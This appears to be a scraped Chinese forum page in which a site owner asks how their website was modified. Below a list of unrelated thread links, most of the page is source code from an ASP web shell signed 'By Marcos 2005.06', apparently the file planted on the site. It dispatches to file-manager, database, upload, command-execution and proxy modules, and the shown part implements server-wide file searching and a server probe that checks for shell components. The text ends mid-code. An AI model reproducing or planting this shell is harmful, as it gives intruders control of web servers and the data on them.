我的网站被人改了,谁能知道是通过什么方法改的,漏洞在那里,里面很多东西我的验证了,还是被改了
http://www.bnd56.com/
http://www.bnd56.com/
解决方案 »
- sql语句问题....急.....
- 网站全部都用自定义控件好吗,有什么优点和缺点吗??
- gridview 修改记录后,显示记录所在的页,而不是绑定第一页。
- [asp.net 2.0]treeview与xml的问题
- ◆◇◆ 帮我将 table 转成 div 。◆◇◆
- 编号难题!
- 有装.net2005的,帮我看看,我装不进去
- 怎样才能实现用asp.net远程连接SQLServer2000的问题?希各位高手帮忙解答!谢谢
- 这是用来做什么的?
- 利用C#编写控件直接打印Web(Html)页面(不用IE菜单打印命令)而且可以做相关设置!
- 做个网站出现了奇怪的问题,求解答
- 安装vs2008 sp1的时候报错。。。谁碰到过这种情况帮忙看下?
<object runat="server" id="fso" scope="page" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<% PageOther()
If pageName <> "" Then
IsIn()
TopMenu()
End If
Select Case pageName
Case "PageSearch"
PageSearch()
Case "PageCheck"
PageCheck()
Case "PageFso"
PageFso()
Case "PageDBTool"
PageDBTool()
Case "PageUpload"
PageUpload()
Case "PagePack"
PagePack()
Case "PageExecute"
PageExecute()
Case "PageWebProxy"
PageWebProxy()
Case "", "PageOut"
PageLogin()
End Select Rem +++++++++++++++++++++++++++++++++++++
Rem 以下是各功能模块部分
Rem +++++++++++++++++++++++++++++++++++++
Sub PageSearch()
Dim strKey, strPath
strKey = GetPost("Key")
Server.ScriptTimeout = 5000
If thePath = "" Then thePath = rootPath
ShowTitle("文本文件搜索器")
SearchTable(strKey)
If theAct <> "" And strKey <> "" Then
SearchIt(strKey)
End If
End Sub
Sub SearchTable(strKey)
echo "<table width=750 border=1>"
echo "<form method=post action='" & url & "'>"
echo "<input type=hidden value=PageSearch name=PageName>"
echo "<tr>"
echo "<td colspan=2 class=td><font face=webdings>8</font> 文本文件搜索器(需FSO支持)</td>"
echo "</tr>"
echo "<tr>"
echo "<td colspan=2 class=trHead> </td>"
echo "</tr>"
echo "<tr>"
echo "<td> 路径</td>"
echo "<td> <input name=thePath type=text id=thePath value='"
echo HtmlEncode(thePath)
echo "' style='width:360px;'>"
echo "</td>"
echo "</tr>"
echo "<tr>"
echo "<td width='20%'> 关键字</td>"
echo "<td> <input name=Key type=text value='" & HtmlEncode(strKey) & "' id=Key style='width:400px;'> "
echo "<select name=theAct id=theAct>"
echo "<option value=FileName selected>仅文件名</option>"
echo "<option value=FileContent>仅文本内容</option>"
echo "<option value=Both>两者都</option>"
echo "</select>"
echo " <input type=submit name=Submit value=提交> </td>"
echo "</tr>"
echo "<tr>"
echo "<td colspan=2 class=trHead> </td>"
echo "</tr>"
echo "<tr align=right>"
echo "<td colspan=2 class=td>By Marcos 2005.06 </td>"
echo "</tr>"
echo "</form>"
echo "</table>"
End Sub
Sub SearchIt(key)
Dim strPath, theFolder
Response.Buffer = True
strPath = thePath
If fso.FolderExists(strPath) = False Then
ShowErr(thePath & " 目录不存在或者不允许访问!")
End If
Set theFolder = fso.GetFolder(strPath)
echo "<br/><div style='width:750;border:1px solid #d8d8f0;'>" Select Case theAct
Case "Both"
Call SearchFolder(theFolder, key, 1)
Case "FileName"
Call SearchFolder(theFolder, key, 2)
Case "FileContent"
Call SearchFolder(theFolder, key, 3)
End Select
echo "</div>"
Set theFolder = Nothing
End Sub
Sub SearchFolder(folder, key, flag)
Dim ext, title, theFile, theFolder
For Each theFile In folder.Files
ext = LCase(fso.GetExtensionName(theFile.Path))
If flag = 1 Or flag = 2 Then
If InStr(LCase(theFile.Name), LCase(key)) > 0 Then echo FileLink(theFile, "")
End If
If flag = 1 Or flag = 3 Then
If Instr(EditableFileExt, "$" & ext & "$") > 0 Then
If SearchFile(theFile, key, title) Then echo FileLink(theFile, title)
End If
End If
Next Response.Flush() For Each theFolder In folder.SubFolders
Call SearchFolder(theFolder, key, flag)
Next
end sub
Function SearchFile(f, s, title)
Dim theFile, content, pos1, pos2
If isDebugMode = False Then On Error Resume Next Set theFile = fso.OpenTextFile(f.Path)
content = theFile.ReadAll()
theFile.Close
Set theFile = Nothing If Err Then
Err.Clear
End If SearchFile = InStr(1, content, s, 1)
If SearchFile > 0 Then
pos1 = InStr(1, content, "<TITLE>", 1)
pos2 = InStr(1, content, "</TITLE>", 1)
title = ""
If pos1 > 0 And pos2 > 0 Then
title = Mid(content, pos1 + 7, pos2 - pos1 - 7)
End If
End If
End Function
Function FileLink(file, title)
fileLink = file.Path
If title = "" Then
title = file.Name
End If
fileLink = " <font color=ff0000>" & title & "</font> " & fileLink & "<br/>"
End Function Sub PageCheck()
ShowTitle("服务器信息探针")
InfoCheck()
If theAct <> "" Then
GetAppOrSession(theAct)
End If
ObjCheck()
End Sub Sub InfoCheck()
Dim aryCheck(6)
If isDebugMode = False Then On Error Resume Next aryCheck(0) = Server.ScriptTimeOut() & "(秒)"
aryCheck(1) = FormatDateTime(Now(), 0)
aryCheck(2) = Request.ServerVariables("SERVER_NAME")
aryCheck(2) = aryCheck(2) & ", " & Request.ServerVariables("LOCAL_ADDR")
aryCheck(2) = aryCheck(2) & ":" & Request.ServerVariables("SERVER_PORT")
aryCheck(3) = Request.ServerVariables("OS")
aryCheck(3) = IIf(aryCheck(3) = "", "Windows2003", aryCheck(3)) & ", " & Request.ServerVariables("SERVER_SOFTWARE")
aryCheck(3) = aryCheck(3) & ", " & ScriptEngine & "/" & ScriptEngineMajorVersion & "." & ScriptEngineMinorVersion & "." & ScriptEngineBuildVersion
aryCheck(4) = rootPath & ", " & GetTheSize(fso.GetFolder(rootPath).Size)
aryCheck(5) = "Path: " & Request.ServerVariables("PATH_TRANSLATED") & "<br />"
aryCheck(5) = aryCheck(5) & " Url : http://" & Request.ServerVariables("SERVER_NAME") & Request.ServerVariables("Url")
aryCheck(6) = "变量数: " & Application.Contents.Count() & "(<a href=javascript:locate('app');>Application</a>),"
aryCheck(6) = aryCheck(6) & " 会话数: " & Session.Contents.Count & "(<a href=javascript:locate('session');>Session</a>),"
aryCheck(6) = aryCheck(6) & " 当前会话ID: " & Session.SessionId() echo "<table width=750 border=1>"
echo "<tr>"
echo "<td colspan=2 class=td><font face=webdings>8</font> 服务器基本信息"
echo "</td>"
echo "</tr>"
echo "<tr>"
echo "<td colspan=2 class=trHead> </td>"
echo "</tr>"
echo "<tr class=td>"
echo "<td width='20%'> 项目</td>"
echo "<td> 值</td>"
echo "</tr>"
echo "<tr>"
echo "<td> 默认超时</td>"
echo "<td> "&aryCheck(0)&"</td>"
echo "</tr>"
echo "<tr>"
echo "<td> 当前时间</td>"
echo "<td> "&aryCheck(1)&"</td>"
echo "</tr>"
echo "<tr>"
echo "<td> 服务器名</td>"
echo "<td> "&aryCheck(2)&"</td>"
echo "</tr>"
echo "<tr>"
echo "<td> 软件环境</td>"
echo "<td> "&aryCheck(3)&"</td>"
echo "</tr>"
echo "<tr>"
echo "<td> 站点目录</td>"
echo "<td> "&aryCheck(4)&"</td>"
echo "</tr>"
echo "<tr>"
echo "<td> 当前路径</td>"
echo "<td> "&aryCheck(5)&"</td>"
echo "</tr>"
echo "<tr>"
echo "<td> 其它</td>"
echo "<td> "&aryCheck(6)&"</td>"
echo "</tr>"
echo "<tr>"
echo "<td colspan=2 class=trHead> </td>"
echo "</tr>"
echo "<tr align=right>"
echo "<td colspan=2 class=td>By Marcos 2005.06 </td>"
echo "</tr>"
echo "</table>"
End Sub Sub ObjCheck()
Dim aryObj(19)
Dim x, objTmp, theObj, strObj
If isDebugMode = False Then On Error Resume Next strObj = Trim(getPost("TheObj"))
aryObj(0) = "MSWC.AdRotator|广告轮换组件"
aryObj(1) = "MSWC.BrowserType|浏览器信息组件"
aryObj(2) = "MSWC.NextLink|内容链接库组件"
aryObj(3) = "MSWC.Tools|"
aryObj(4) = "MSWC.Status|"
aryObj(5) = "MSWC.Counters|计数器组件"
aryObj(6) = "MSWC.PermissionChecker|权限检测组件"
aryObj(7) = "Adodb.Connection|ADO 数据对象组件"
aryObj(8) = "CDONTS.NewMail|虚拟 SMTP 发信组件"
aryObj(9) = "Scripting.FileSystemObject|FSO组件"
aryObj(10) = "Adodb.Stream|Stream 流组件"
aryObj(11) = "Shell.Application|"
aryObj(12) = "WScript.Shell|"
aryObj(13) = "Wscript.Network|"
aryObj(14) = "ADOX.Catalog|"
aryObj(15) = "JMail.SmtpMail|JMail 邮件收发组件"
aryObj(16) = "Persits.Upload.1|ASPUpload 文件上传组件"
aryObj(17) = "LyfUpload.UploadFile|刘云峰的文件上传组件组件"
aryObj(18) = "SoftArtisans.FileUp|SA-FileUp 文件上传组件"
aryObj(19) = strObj & "|您所要检测的组件"